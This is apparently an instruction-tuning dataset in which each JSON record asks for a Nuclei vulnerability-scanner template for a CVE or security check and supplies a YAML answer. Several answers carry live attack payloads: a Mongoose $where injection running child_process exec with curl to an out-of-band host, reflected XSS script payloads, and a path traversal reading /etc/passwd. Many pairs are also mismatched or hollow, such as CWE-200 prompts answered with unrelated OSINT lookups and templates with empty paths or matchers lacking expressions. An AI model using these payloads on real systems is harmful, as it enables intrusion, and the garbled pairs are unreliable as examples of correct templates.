+{"instruction": "Generate a Nuclei template for: SurveySparrow takeover detection", "input": "Title: SurveySparrow takeover detection\nSummary: SurveySparrow takeover detection. SurveySparrow takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: surveysparrow-takeover\n\ninfo:\n name: SurveySparrow takeover detection\n author: philippedelteil\n severity: high\n description: SurveySparrow takeover was detected.\n tags: takeover,surveysparrow,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Account not found.\" \n - \"ouch!\" \n - \"SurveySparrow\" \n condition: and", "category": "generic", "severity": "high", "id": "surveysparrow-takeover"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dribbble\n\ninfo:\n name: Dribbble User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Dribbble user name information check was conducted.\n tags: osint,osint-art,dribbble,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://dribbble.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" | Dribbble\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Unauthenticated Netdata", "input": "Title: Unauthenticated Netdata\nSummary: Unauthenticated Netdata. Netdata is exposed.. Tags: netdata, unauth, misconfig\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: unauthenticated-netdata\n\ninfo:\n name: Unauthenticated Netdata\n author: dhiyaneshDk\n severity: medium\n description: Netdata is exposed.\n tags: netdata,unauth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"view_update_every\" \n - \"dimensions\" \n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header", "category": "generic", "severity": "medium", "id": "unauthenticated-netdata"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - GStatic Angular", "input": "Title: Content-Security-Policy Bypass - GStatic Angular\nSummary: Content-Security-Policy Bypass - GStatic Angular. Tags: xss, csp-bypass, gstatic-angular\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gstatic-angular-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - GStatic Angular\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - GStatic Angular\n tags: xss,csp-bypass,gstatic-angular,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"gstatic.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "gstatic-angular-csp-bypass"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: oglaszamy24hpl\n\ninfo:\n name: Oglaszamy24h.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Oglaszamy24h.pl user name information check was conducted.\n tags: osint,osint-shopping,oglaszamy24hpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://oglaszamy24h.pl/profil,{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Profil u\u017cytkownika:\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2016-1000129", "input": "Title: Cross-Site Scripting (XSS) in defa-online-image-protector_project defa-online-image-protector\nSummary: Reflected XSS in wordpress plugin defa-online-image-protector v3.3\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: defa-online-image-protector_project defa-online-image-protector\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-1000129\n\ninfo:\n name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Defa Online Image Protector\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2016-1000129"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: unauth-pact-broker\n\ninfo:\n name: Unauth Pact Broker - Detect\n author: pdteam\n severity: medium\n description: Unauthenticated access to Pact Broker, a repository for consumer-driven contracts and verification results.\n tags: pactbroker,misconfig,unauth,pacts,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/pacts\" \n - \"{{BaseURL}}/ui/relationships\" \n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Abstract Api Company Enrichment Test", "input": "Title: Abstract Api Company Enrichment Test\nSummary: Abstract Api Company Enrichment Test. Enrich any domain or email with accurate company data, including headcount, location and industry.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-abstract-company-enrichment\n\ninfo:\n name: Abstract Api Company Enrichment Test\n author: daffainfo\n severity: info\n description: Enrich any domain or email with accurate company data, including headcount, location and industry.\n tags: token-spray,abstractapi\n\nhttp:\n - method: GET\n path:\n - \"https://companyenrichment.abstractapi.com/v1/?api_key={{token}}&domain=airbnb.com\" \n matchers:\n - type: word\n words:\n - \"\"name\":\" \n - \"\"domain\":\" \n - \"\"year_founded\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-abstract-company-enrichment"}
+{"instruction": "Generate a Nuclei template for CVE-2019-16097", "input": "Title: Missing Authorization in linuxfoundation harbor\nSummary: core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.\nVulnerability Type: Missing Authorization\nSeverity: medium\nAffected Products: linuxfoundation harbor\nIndicators: error, vulnerability detected", "output": "id: harbor-workflow\n\ninfo:\n name: Harbor Security Checks\n author: pikpikcu\n severity: info\n description: A simple workflow that runs all Harbor related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2019-16097"}
+{"instruction": "Generate a Nuclei template for: Generic C2 JARM - Detect", "input": "Title: Generic C2 JARM - Detect\nSummary: Generic C2 JARM - Detect. Detect C2 Servers with JARM Hashes\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: generic-c2-jarm\n\ninfo:\n name: Generic C2 JARM - Detect\n author: pussycat0x\n severity: info\n description: Detect C2 Servers with JARM Hashes\n tags: network,jarm,c2,ir,osint,cti,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "generic-c2-jarm"}
+{"instruction": "Generate a Nuclei template for CVE-2024-53900", "input": "Title: SQL Injection in mongoosejs mongoose\nSummary: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: mongoosejs mongoose\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-53900\n\ninfo:\n name: Mongoose < 8.8.3 - Remote Code Execution\n author: h4mg\n severity: critical\n description: Mongoose before 8.8.3 can improperly use $where in match, leading to search injection.\n tags: cve,cve2024,rce,mongoose,nosql,nodejs,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?view[path]={{pfield}}&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('curl {{interactsh-url}}')\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-53900"}
+{"instruction": "Generate a Nuclei template for CVE-2020-8193", "input": "Title: Vulnerability (CWE-284) in citrix application_delivery_controller_firmware and others\nSummary: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\nVulnerability Type: Vulnerability (CWE-284)\nSeverity: medium\nAffected Products: citrix application_delivery_controller_firmware, citrix netscaler_gateway_firmware, citrix gateway_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-8193\n\ninfo:\n name: Citrix - Local File Inclusion\n author: pdteam\n severity: medium\n description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.\n tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "medium", "id": "CVE-2020-8193"}
+{"instruction": "Generate a Nuclei template for: Unconfigured Cloud CDN Origin Authentication", "input": "Title: Unconfigured Cloud CDN Origin Authentication\nSummary: Unconfigured Cloud CDN Origin Authentication. Ensure that Cloud CDN origins are configured to authenticate access to the content available at backend (backend buckets or backend services) using signed cookies and signed URLs. Signed cookies and URLs are designed to prevent unauthorized users from bypassing the authentication process and accessing sensitive information.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-cdn-origin-auth-unconfigured\n\ninfo:\n name: Unconfigured Cloud CDN Origin Authentication\n author: princechaddha\n severity: medium\n description: Ensure that Cloud CDN origins are configured to authenticate access to the content available at backend (backend buckets or backend services) using signed cookies and signed URLs. Signed cookies and URLs are designed to prevent unauthorized users from bypassing the authentication process and accessing sensitive information.\n tags: cloud,devops,gcp,gcloud,cloud-cdn,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-cdn-origin-auth-unconfigured"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: plesk-obsidian-login\n\ninfo:\n name: Plesk Obsidian Login Panel - Detect\n author: dhiyaneshDK,daffainfo\n severity: info\n description: Plesk Obsidian login panel was detected.\n tags: panel,plesk,login,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login_up.php\" \n matchers:\n - type: word\n words:\n - \"Plesk Obsidian\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2023-39598", "input": "Title: Cross-Site Scripting (XSS) in icewarp webclient\nSummary: Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: icewarp webclient\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39598\n\ninfo:\n name: IceWarp Email Client - Cross Site Scripting\n author: Imjust0\n severity: medium\n description: Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n tags: cve2023,cve,xss,icewarp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\">\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"icewarp\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-39598"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: contentkeeper-detect\n\ninfo:\n name: ContentKeeper Cloud Panel - Detect\n author: geeknik\n severity: info\n description: ContentKeeper Cloud panel was detected.\n tags: contentkeeper,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ck/domenu.cgi\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"ContentKeeper Technologies\" \n - \"ContentKeeper.com\" \n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Secure Transfer for OSS Buckets - Disabled", "input": "Title: Secure Transfer for OSS Buckets - Disabled\nSummary: Secure Transfer for OSS Buckets - Disabled. Disabling secure transfer (HTTPS) for OSS buckets exposes data to potential interception. It is recommended to enable HTTPS to ensure encrypted communication and data security.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: secure-transfeross-disabled\n\ninfo:\n name: Secure Transfer for OSS Buckets - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Disabling secure transfer (HTTPS) for OSS buckets exposes data to potential interception. It is recommended to enable HTTPS to ensure encrypted communication and data security.\n tags: cloud,devops,aliyun,alibaba,aliyun-cloud-config,alibaba-oss\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "secure-transfeross-disabled"}
+{"instruction": "Generate a Nuclei template for CVE-2010-1305", "input": "Title: Path Traversal in joomlamo com_jinventory\nSummary: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: joomlamo com_jinventory\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1305\n\ninfo:\n name: Joomla! Component JInventory 1.23.02 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,joomlamo,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1305"}
+{"instruction": "Generate a Nuclei template for: Zsh - Privilege Escalation", "input": "Title: Zsh - Privilege Escalation\nSummary: Zsh - Privilege Escalation. zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-zsh\n\ninfo:\n name: Zsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: zsh is a powerful and feature-rich shell for Unix-like operating systems. It offers advanced interactive features, extensive customization options, and robust scripting capabilities\n tags: code,linux,zsh,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-zsh"}
+{"instruction": "Generate a Nuclei template for: Allegro RomPager - Panel", "input": "Title: Allegro RomPager - Panel\nSummary: Allegro RomPager - Panel. Allegro RomPager was detected.This toolkit was commonly used in embedded devices such as routers, cameras, and IoT devices, often on historical hardware with possible default credentials.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: allegro-rompager-panel\n\ninfo:\n name: Allegro RomPager - Panel\n author: matejsmycka\n severity: info\n description: Allegro RomPager was detected.This toolkit was commonly used in embedded devices such as routers, cameras, and IoT devices, often on historical hardware with possible default credentials.\n tags: tech,allegro,rompager,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Allegro-Software-RomPager/\" \n part: server\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "allegro-rompager-panel"}
+{"instruction": "Generate a Nuclei template for CVE-2021-25085", "input": "Title: Cross-Site Scripting (XSS) in pluginus woocommerce_products_filter\nSummary: The WOOF WordPress plugin before 1.2.6.3 does not sanitise and escape the woof_redraw_elements before outputing back in an admin page, leading to a Reflected Cross-Site Scripting\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: pluginus woocommerce_products_filter\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25085\n\ninfo:\n name: WOOF WordPress plugin - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=\" \n matchers:\n - type: word\n words:\n - \"\"additional_fields\":[\"\"]}\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-25085"}
+{"instruction": "Generate a Nuclei template for CVE-2020-36731", "input": "Title: Cross-Site Scripting (XSS) in wpdesk flexible_checkout_fields_for_woocommerce\nSummary: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: wpdesk flexible_checkout_fields_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-36731\n\ninfo:\n name: Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update\n author: popcorn94\n severity: high\n description: The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.\n tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"order_\" \n - \"[custom_field]\" \n - \"inspire_checkout_fields[settings][order]\" \n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Settings resetted.\"", "category": "cve", "severity": "high", "id": "CVE-2020-36731"}
+{"instruction": "Generate a Nuclei template for CVE-2021-20021", "input": "Title: Vulnerability (CWE-269) in sonicwall email_security and others\nSummary: A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: sonicwall email_security, sonicwall email_security_appliance_9000_firmware, sonicwall email_security_appliance_3300_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-20021\n\ninfo:\n name: SonicWall Email Security <= 10.0.9.x - Unauthenticated Admin Account Creation\n author: pussycat0x\n severity: critical\n description: SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.\n tags: cve,cve2021,sonicwall,email-security,auth-bypass,kev,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.html\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-20021"}
+{"instruction": "Generate a Nuclei template for CVE-2025-54251", "input": "Title: Vulnerability (CWE-91) in adobe experience_manager\nSummary: Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to manipulate XML queries and gain limited unauthorized write access.\nVulnerability Type: Vulnerability (CWE-91)\nSeverity: medium\nAffected Products: adobe experience_manager\nIndicators: unauthorized", "output": "id: CVE-2025-54251\n\ninfo:\n name: Adobe Experience Manager \u2264 6.5.23.0 - XML Injection\n author: DhiyaneshDK,assetnote\n severity: medium\n description: Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.\n tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-54251"}
+{"instruction": "Generate a Nuclei template for: JavaServer Faces Detection", "input": "Title: JavaServer Faces Detection\nSummary: JavaServer Faces Detection. Searches for JavaServer Faces content on a URL.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jsf-detect\n\ninfo:\n name: JavaServer Faces Detection\n author: brenocss,Moritz Nentwig\n severity: info\n description: Searches for JavaServer Faces content on a URL.\n tags: jsf,tech,primefaces,richfaces,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "jsf-detect"}
+{"instruction": "Generate a Nuclei template for: Server-Side Encryption on Amazon S3 Buckets", "input": "Title: Server-Side Encryption on Amazon S3 Buckets\nSummary: Server-Side Encryption on Amazon S3 Buckets. This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS).\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: s3-server-side-encryption\n\ninfo:\n name: Server-Side Encryption on Amazon S3 Buckets\n author: princechaddha\n severity: high\n description: This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS).\n tags: cloud,devops,aws,amazon,s3,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "s3-server-side-encryption"}
+{"instruction": "Generate a Nuclei template for: Domibus - Detect", "input": "Title: Domibus - Detect\nSummary: Domibus - Detect. Domibus was detected.\n. Tags: tech, domibus, detect\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: domibus-detect\n\ninfo:\n name: Domibus - Detect\n author: righettod\n severity: info\n description: Domibus was detected.\n tags: tech,domibus,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/domibus/rest/application/info\" \n - \"{{BaseURL}}/domibus/\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "domibus-detect"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ulubpl\n\ninfo:\n name: Ulub.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Ulub.pl user name information check was conducted.\n tags: osint,osint-misc,ulubpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"http://ulub.pl/profil/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Muzyka (\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2024-11587", "input": "Title: Cross-Site Scripting (XSS) in idccms idccms\nSummary: A vulnerability was found in idcCMS 1.60. It has been classified as problematic. This affects the function GetCityOptionJs of the file /inc/classProvCity.php. The manipulation of the argument idName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: idccms idccms\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11587\n\ninfo:\n name: idcCMS V1.60 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.\n tags: cve,cve2024,xss,idccms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"add(new Option\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "low", "id": "CVE-2024-11587"}
+{"instruction": "Generate a Nuclei template for: Set SSH Idle Timeout Interval", "input": "Title: Set SSH Idle Timeout Interval\nSummary: Set SSH Idle Timeout Interval. Missing an SSH idle timeout interval can lead to security risks by allowing unattended sessions to remain open, increasing the chance of unauthorized access or session hijacking.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: file-idle-timeout-interval\n\ninfo:\n name: Set SSH Idle Timeout Interval\n author: pussycat0x\n severity: info\n description: Missing an SSH idle timeout interval can lead to security risks by allowing unattended sessions to remain open, increasing the chance of unauthorized access or session hijacking.\n tags: audit,config,file,ssh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "file-idle-timeout-interval"}
+{"instruction": "Generate a Nuclei template for: ACM Certificates Pre-expiration Renewal", "input": "Title: ACM Certificates Pre-expiration Renewal\nSummary: ACM Certificates Pre-expiration Renewal. Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: acm-cert-renewal-45days\n\ninfo:\n name: ACM Certificates Pre-expiration Renewal\n author: princechaddha\n severity: medium\n description: Ensure AWS ACM SSL/TLS certificates are renewed at least 45 days before expiration to prevent service disruptions.\n tags: cloud,devops,aws,amazon,acm,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "acm-cert-renewal-45days"}
